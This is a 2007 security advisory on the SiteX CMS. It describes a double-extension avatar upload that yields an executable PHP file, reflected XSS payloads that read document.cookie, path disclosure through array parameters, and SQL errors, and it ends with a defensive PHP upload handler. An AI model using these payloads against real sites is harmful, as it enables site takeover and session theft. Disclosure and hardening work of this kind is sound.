sitex-multi.txt

Date: 28 Feb 2007
Reported by: laurent gaffie
Type: packetstorm
Source: packetstormsecurity.com

Critical risk due to upload vulnerability and various XSS and SQL injection vulnerabilities, leading to full path disclosure and multiple SQL errors

`global risk:critical  
  
upload vulnerability:  
in the user profile, upload an avatar with a double extension like:  
file.php.jpg   
once it's done, you are going to get an error like: Fatal error: Call to undefined function imagedestroy() in /.  
but the last extension (jpg) will be removed by the script, and the file is stored in:  
/content/avatars   
as random_numberfile.php  
  
xss get :  
/sitex/calendar.php?sxMonth=1&sxYear='"><script>alert(document.cookie)</script>  
/sitex/search.php?search=<script>alert(document.cookie)</script>  
  
xss via mysql error:  
/sitex/redirect.php?linkid='</textarea>'"><script>alert(document.cookie)</script>  
/calendar_events.php?page='"><script>alert(document.cookie)</script>  
  
full path disclosure:  
/sitex/calendar.php?sxMonth[]=1  
/sitex/calendar.php?sxMonth=1&sxYear[]=2007  
/calendar_events.php?page[]=1  
  
multiple SQL errors:  
just add a ' to any variable,  
or to any field (as in forum, search, etc.)  
  
regards laurent gaffié  
`
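
The upload issue above comes from building the stored file name out of the client-supplied name. A hardened avatar handler is sketched below as an added example; it is not SiteX code and not part of the original advisory, and the function names and the `$avatarDir` parameter are hypothetical:

```php
<?php
// Added example: hypothetical hardened avatar handler (not SiteX code).
// Allowed image types mapped to the only extensions the server will ever write.
const AVATAR_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Returns the extension to store for an uploaded file, or null to reject it.
 * The decision is made from the file's bytes, never from the client file name.
 */
function avatar_extension(string $tmpPath): ?string
{
    // getimagesize() is in PHP's standard extension and does not need GD.
    $info = @getimagesize($tmpPath);   // false when the bytes are not an image
    if ($info === false) {
        return null;
    }
    return AVATAR_TYPES[$info['mime']] ?? null;
}

/** Builds the stored name from server-side randomness plus the detected extension. */
function avatar_store_name(string $ext): string
{
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

/** Returns the stored file name on success, or null when the upload is rejected. */
function save_avatar(array $upload, string $avatarDir): ?string
{
    if (($upload['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($upload['tmp_name'])) {
        return null;
    }
    $ext = avatar_extension($upload['tmp_name']);
    if ($ext === null) {
        return null;                   // e.g. file.php.jpg that holds PHP, not image data
    }
    $name = avatar_store_name($ext);   // $upload['name'] is never used
    if (!move_uploaded_file($upload['tmp_name'], $avatarDir . '/' . $name)) {
        return null;
    }
    return $name;
}
```

Because a file can carry a valid image header and still contain script text, the avatar directory should also be configured so the web server never executes scripts from it.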
